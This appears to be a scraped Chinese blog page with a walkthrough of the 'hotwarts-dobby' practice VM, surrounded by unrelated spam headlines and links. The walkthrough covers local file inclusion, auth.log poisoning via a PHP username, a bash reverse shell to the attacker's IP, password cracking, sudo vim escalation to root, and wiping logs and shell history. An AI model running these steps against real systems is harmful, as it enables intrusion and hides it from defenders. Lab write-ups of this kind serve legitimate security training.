当前位置: 首页 > news >正文

哪个网站有免费ppt下载查找网站

哪个网站有免费ppt下载,查找网站,高埗东莞网站建设,wordpress产品网站前言 靶机:hotwarts-dobby,ip地址为192.168.1.69 攻击:kali,ip地址为192.168.1.16 都采用虚拟机,网卡为桥接模式 主机发现 使用arp-scan -l或netdiscover -r 192.168.1.1/24扫描发现主机 信息收集 使用nmap扫描端…

前言

靶机:hotwarts-dobby,ip地址为192.168.1.69

攻击:kali,ip地址为192.168.1.16

都采用虚拟机,网卡为桥接模式

主机发现

使用arp-scan -lnetdiscover -r 192.168.1.1/24扫描发现主机

信息收集

使用nmap扫描端口

网站信息探测

访问80端口,发现界面显示一串字符,观察其规律,最后有.php,可能是一个文件

查看页面源代码,可以看到给出几个信息点,其中一句话中大概意思是,这次在源代码界面中没有东西,或许我已经告诉你一个目录,.php文件

最终去重后,发现为一个php文件ikilledsiriusblack.php

漏洞寻找

根据前面的页面源代码查询中,发现有一个文件包含,参数为file,那么测试是否可行,尝试包含文件/etc/passwd,发现可以,并发现一个用户lestrange,只是,其采用的是rbash

测试发现,只是本地文件包含,并且/etc/shadow无权限

再次尝试对网站进行目录爆破,不过并没有东西产出

那么尝试使用ffuf配合linux的一些关键目录文件进行测试,观察有哪些可以访问

ffuf -c -w /usr/share/wordlists/linux_file.txt -u http://192.168.1.69/ikilledsiriusblack.php?file=FUZZ -fs 1728,0 
# -fs是过滤一些特定字节的网页,1728是其网站的默认字节
#这里的字典可以去github上下载一个

发现日志文件auth.log可以访问,尝试进行污染,因为该文件中在进行ssh身份认证时,会记录用户名及相关信息,所需要做的就是把用户名改成一段php代码

漏洞利用

然后尝试进行代码注入

这时候大概率已经注入成功,可以进行查看,一般都是在文件的最后位置,结合前面的信息,一般登录失败会把用户也显示,但是php作为脚本语言,并不会直接显示,判定,已经成功,记录在文件中了

那么尝试利用注入的代码,注入的代码可用

反弹shell

尝试进行一个bash反弹,获取终端

/bin/bash-c 'bash -i >& /dev/tcp/192.168.1.16/1234 >&1'
#这里最好对该语句进行URL编码处理

先在kali中使用nc开启一个监听,浏览器执行上面的语句后就会在kali中反弹成功

然后习惯性的查看当前目录下的文件,意外发现一个root所有者的目录,并且还可以查看,而且还是进行编码处理的名称

解码发现名称是secret,那就值得关注,进入到该目录,发现一个文件,查看后,发现是用户lestrange的hash

提权

水平提权至lestrange

那就简单了,这里可以直接进行hash破解,不过这里还是复习一下unshadow的使用,查看/etc/passwd中的lestrange,然后复制到kali中的一个文件,并把上面的hash也都复制到一个文件,使用unshadow整合在一起后,使用john爆破

这里需要注意,在查看目录是尽量使用ls -al,因为我这里就是因为使用kali中的字典进行爆破,但是长时间没效果,然后再次寻找的时候,发现提供了一个字典

复制该文件的内容,或者下载,怎么都行,只要把内容复制到kali中,然后使用john破解,发现密码ihateharrypotter

#复制文件/etc/passwd内容到kali中的user文件
#复制文件Swordofgryffindor内容到kali中的pass文件
#复制文件字典.sercret.dic内容到kali中的word.txt文件
#使用unshadow整合两个文件到userpass
unshadow user pass > userpass
john userpass --wordlist=word.txt 

这里图片中出现两次john是显示问题

使用用户名lestrange和密码ihateharrypotter登录ssh

查看当前目录下的文件,发现.bash_history,查看其内容

垂直提权至root

根据上面的历史命令记录,可能存在sudo提权,所以就不再使用find寻找具有SUID权限文件,直接sudo -l

发现vim,并且对应之前命令历史记录中的语句,可以直接使用,或者查看网站gtfobins.github.io中的方式

使用命令sudo vim -c ':!/bin/sh'提权,成功至root

并且有个script.sh脚本,查看发现原来是更改auth.log权限的

清理痕迹

日志清理,因为这次主要就是auth.log日志文件,所以要好好清理

sed -i "/192.168.1.16/d" /var/log/auth.log
echo > /var/log/btmp
echo > /var/log/faillog
echo > /var/log/lastlog
echo > /var/log/wtmp
echo > /var/log/apache2/access.log
echo > /var/log/apache2/error.log

历史命令记录

history -r 
history -c

总结

该靶场考察以下几点:

  1. 对于文件的发现,发现到的都要测试一下
  2. php语言的文件包含,此处使用的是include,包含时,会执行其文件
  3. 对于linux中的一些文件如何配合文件包含,这里就是身份认证日志文件auth.log,因为用户名是可控的,所以传入了脚本语言,导致造成危害
  4. 对于常见的提权,可以通过查看命令历史记录寻找其中可利用的点,或者利用suid或者sudo等提权
http://www.yayakq.cn/news/685401/

相关文章:

  • 佛山网站优化平台哪里有营销型网站制作
  • 鹿城区住房和城乡建设局网站phpcms如何发布网站
  • 杭州网站设计 网站商城网站系统建设
  • 推荐佛山顺德网站建设微信小程序开发视频教程
  • 可信网站认证服务商a站全称
  • 莱西做网站公司关于自行建设门户网站的请示
  • 轴承网站建设wordpress喜欢插件
  • 企业网站源码挣钱吗梁朝伟做汤唯视频网站
  • 建设网站 软件wordpress菜单栏下拉
  • 网站开发后端做什么河南百度建个网站
  • 安徽省建设厅执业资格注册中心网站做暧暧网站在线看
  • 网站怎么做展现量珠海企业模板建站
  • 重庆市企业网站建设长沙网站设计咨询电话
  • 微网站 制作网站如何接广告赚钱
  • 做的最好的相亲网站上海什么做网站的公司比较好
  • 建设银行集团网站网站版权该怎么做呢
  • 云南做网站需要多少钱苏州网站建设专业的公司
  • 建设网站公司哪里好广告素材
  • 网站seo步骤昌邑市建设局网站
  • 网站如何防止黑客攻击wordpress被提权
  • o2o商城分销网站开发天津建设网站
  • 深圳市龙岗区建设局官网网站海城网站制作建设
  • 个人网站设计结构图站长之家下载
  • 群晖nda做网站win7 iis网站设置
  • 做宣传语的网站dw自己做网站需要什么区别
  • 如何在社交网站做销售佛山公司官网制作哪家好
  • 适合做网站开发的电脑配置网络运营具体做什么
  • 模板和网站可以分开吗重庆网站建设外包公司
  • 社区网站建设方案ppt怎么成为百度推广代理商
  • wordpress 微信导航站企业宣传册ppt模板